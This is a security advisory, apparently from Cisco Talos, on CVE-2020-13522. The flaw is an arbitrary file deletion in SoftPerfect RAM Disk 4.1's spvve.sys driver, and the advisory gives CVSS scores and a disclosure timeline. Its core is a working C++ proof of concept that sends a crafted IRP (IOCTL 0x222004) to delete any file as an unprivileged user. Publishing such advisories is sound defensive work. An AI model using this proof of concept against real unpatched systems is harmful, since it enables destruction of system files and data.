3.6 Low
CVSS2
Attack Vector
LOCAL
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:L/AC:L/Au:N/C:N/I:P/A:P
7.1 High
CVSS3
Attack Vector
LOCAL
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
NONE
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H
0.0004 Low
EPSS
Percentile
12.8%
CVE-2020-13522
An exploitable arbitrary file delete vulnerability exists in SoftPerfect RAM Disk 4.1 spvve.sys driver. A specially crafted I/O request packet (IRP) can allow an unprivileged user to delete any file on the filesystem. An attacker can send a malicious IRP to trigger this vulnerability.
The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.
SoftPerfect RAM Disk 4.1
RAM Disk - <https://www.softperfect.com/products/ramdisk/>
8.8 - CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
CWE-269 - Improper Privilege Management
SoftPerfect RAM Disk is a high-performance RAM disk application that allows the user to store a disk from their computer on the deviceβs space.
The spvve.sys driver creates a device object Device\SoftPerfectVolume
that is accessible to any user on the system so any user sending specially crafted I/O request packet (IRP) can cause arbitrary file deletion. This allows a regular user to delete any file in the system:
VOID kernelFileDelete(HANDLE hDevice, const wchar_t* filePath)
{
wchar_t fileName2[] = L"\\DosDevices\\C:\\WINDOWS\\doesnotmatter.ini";
DWORD DATA_SIZE = 24;
DWORD someData3 = 0;
DWORD fileName1Size = wcslen(filePath) * 2;
const DWORD inBufferSize = DATA_SIZE + fileName1Size + sizeof(fileName2) + someData3;
const DWORD outBufferSize = 4;
PBYTE inBuffer = new BYTE[inBufferSize];
PBYTE outBuffer = new BYTE[outBufferSize];;
DWORD returned = 0;
memset(inBuffer, 'A', inBufferSize);
memcpy(inBuffer + DATA_SIZE, filePath, fileName1Size);
memcpy(inBuffer + DATA_SIZE + fileName1Size, fileName2, sizeof(fileName2));
setData<DWORD>(inBuffer, 0, 0x2);
setData<WORD>(inBuffer, 0x16, fileName1Size);
setData<WORD>(inBuffer, 5, sizeof(fileName2));
setData<WORD>(inBuffer, 0x14, someData3); //somedata3
setData<BYTE>(inBuffer, 4, 1);
setData<QWORD>(inBuffer, 7, 0);
DeviceIoControl(hDevice,
0x222004,
inBuffer,
inBufferSize,
outBuffer,
outBufferSize,
&returned,
0);
printf("returned bytes : 0x%x\n", returned);
neolib::hex_dump(outBuffer, returned, std::cout);
system("PAUSE");
}
As a result, the file pointed to by filePath
will be deleted.
2020-07-16 - Vendor Disclosure
2020-07-23 - Vendor Patched
2020-08-04 - Public Release
Discovered by a member of Cisco Talos.
Vulnerability Reports Next Report
TALOS-2020-1128
Previous Report
TALOS-2020-1122
3.6 Low
CVSS2
Attack Vector
LOCAL
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:L/AC:L/Au:N/C:N/I:P/A:P
7.1 High
CVSS3
Attack Vector
LOCAL
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
NONE
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H
0.0004 Low
EPSS
Percentile
12.8%